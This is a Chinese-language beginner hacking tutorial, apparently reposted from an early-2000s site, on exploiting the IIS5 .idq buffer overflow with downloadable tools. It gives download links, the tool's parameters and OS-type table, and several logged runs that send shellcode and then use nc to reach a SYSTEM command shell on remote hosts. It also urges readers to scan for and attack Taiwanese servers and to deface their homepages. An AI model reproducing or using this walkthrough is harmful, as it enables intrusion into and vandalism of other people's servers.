搜狗
alimama
ali
阿里
阿里妈妈
sogou
第一卷 第一十一章

?近日在奇兵兄的网站看到了一篇特别适合我们这种菜鸟的文章,特地借来让大家看看。  

好了,不在说了!我们开始吧!大家一定听说过.ida&.idq漏洞了吧!一个很简单,有实用的东东!菜鸟最适合了,什么,你等不及了啊,好好好,我这就说!  

去这里看看吧~  http://www.cnqb.net/soft/idq.zip  

http://www.cnqb.net/down/  

有两个程序,IISMiscOverflowV1_Build0010.exe和IISIDQOverflowV1_Build0010.exe  

下载运行前者出现了程序的主界面.  

看看我的实战吧~~~  

首先找到有.idq漏洞的机器,流光可以扫描到.很多的.随便来一个.  最好扫台湾的哦!什么地址!!!!!你没地址吗,好好好,算我考虑周到,给个给你,要是没扫到的话自己想办法,告诉你到新浪搜索一下台湾的不就有很多了吗!  

在被攻击IP地址后面写上对方的IP.端口号一般不需要改动.  

左面选择操作系统类型.先选择IIS5  English  Win2k  Sp0吧~  

软件的默认绑定CMD.EXE的端口是813.不改了.用默认吧~~~  

点击IDQ溢出~~OK~~出现发送Shellcode成功的提示了.  

都说nc比telnet强大.用nc吧~  

##########注意:DOS状态###########  

E:\>nc  -vv  XXX.XXX.XXX.XXX  813  

XXX.XXX.XXX.XXX:  inverse  host  lookup  failed:  h_errno  11004:  NO_DATA  

(UNKNOWN)  [XXX.XXX.XXX.XXX]  813  (?):  connection  refused  

sent  0,  rcvd  0:  NOTSOCK  

E:\>  

看来没成功.  别灰心,在来一次嘛!  

换用IIS5  English  Win2k  Sp1再试!  

E:\>nc  -vv  XXX.XXX.XXX.XXX  813  

XXX.XXX.XXX.XXX:  inverse  host  lookup  failed:  h_errno  11004:  NO_DATA  

(UNKNOWN)  [XXX.XXX.XXX.XXX]  813  (?)  open  

Microsoft  Windows  2000  [Version  5.00.2195]  

(C)  Copyright  1985-2000  Microsoft  Corp.  

C:\WINNT\system32>  

OK!!!终于上来了...往下不用我再教你了吧~~~~你不用在向用unicode那样害怕权限不够了.你现在可是system权限.好了慢慢玩吧~  

这个软件非常不错.但是还提供了对中文IIS的攻击.请大家慎用~~~小心了!!!!!!  

其实这篇文章想介绍命令行版本.但是我运行命令行版本时总是出现错误.运行不成功.自己去试一下吧~~~  

最后再嘱咐一声~~~不要对国内主机做什么!!!危险!!!!!  爱国哦!记住没有啊!  

中午饭都还没有吃呢!  

########################################################################################  

接下来就是IISIDQOverflowV1_Build0010.exe了!为了方便,可以把他改名比如idq.exe  

在DOS状态下(假设idq.exe在c:\下)  

c:\idq.exe  

运行参数:  操作系统类型  目的地址  web端口  溢出端口  

支持的操作系统  类型:  ----  

0  --  IIS5中文Win2k  Sp0  

1  --  IIS5中文Win2k  Sp1  

2  --  IIS5中文Win2k  Sp2  

3  --  IIS5  English  Win2k  Sp0  

4  --  IIS5  English  Win2k  Sp1  

5  --  --not  support  --  IIS5  English  Win2k  Sp2  

6  --  IIS5  Japanese  Win2k  Sp0  

7  --  IIS5  Japanese  Win2k  Sp1  

8  --  --not  support  --  IIS5  Japanese  Win2k  Sp2  

IIS5  IDQ  Overflow.  by  snake.  (http://snake12.top263.net)  2000/07  

c:\>idq  3  XXX.XXX.XXX.XXX80  456  

连接目的机器  XXX.XXX.XXX.XXX:80  OK.  

发送shellcode  到  XXX.XXX.XXX.XXX:80  OK  

现在,你可以  连接  该主机的  端口  456了,good  luck.!  

都祝我好运了.开始吧~~~  

c:\>nc  -vv  XXX.XXX.XXX.XXX  456  

mail.rycf.org  [XXX.XXX.XXX.XXX]  456  (?):  connection  refused  

sent  0,  rcvd  0:  NOTSOCK  

没成功.试试sp1.  

c:\>idq  4  XXX.XXX.XXX.XXX  80  888  

连接目的机器  XXX.XXX.XXX.XXX:80  OK.  

发送shellcode  到  XXX.XXX.XXX.XXX:80  OK  

现在,你可以  连接  该主机的  端口  888了,good  luck.!  

c:\>nc  -vv  XXX.XXX.XXX.XXX  888  

XXX.XXX.XXX.XXX:  inverse  host  lookup  failed:  h_errno  11004:  NO_DATA  

(UNKNOWN)  [XXX.XXX.XXX.XXX]  888  (?)  open  

Microsoft  Windows  2000  [Version  5.00.2195]  

(C)  Copyright  1985-2000  Microsoft  Corp.  

C:\WINNT\system32>  

呵呵!OK!现在你想干什么啊!把他的主页换成自己的怎么样啊!怎么不懂啊!  

那我也没办法了,不懂就来请教我怎么样啊!http;//www.cnqb.net  

本篇文章有什么不足之处望指出!本人先谢了!

[猫扑广告]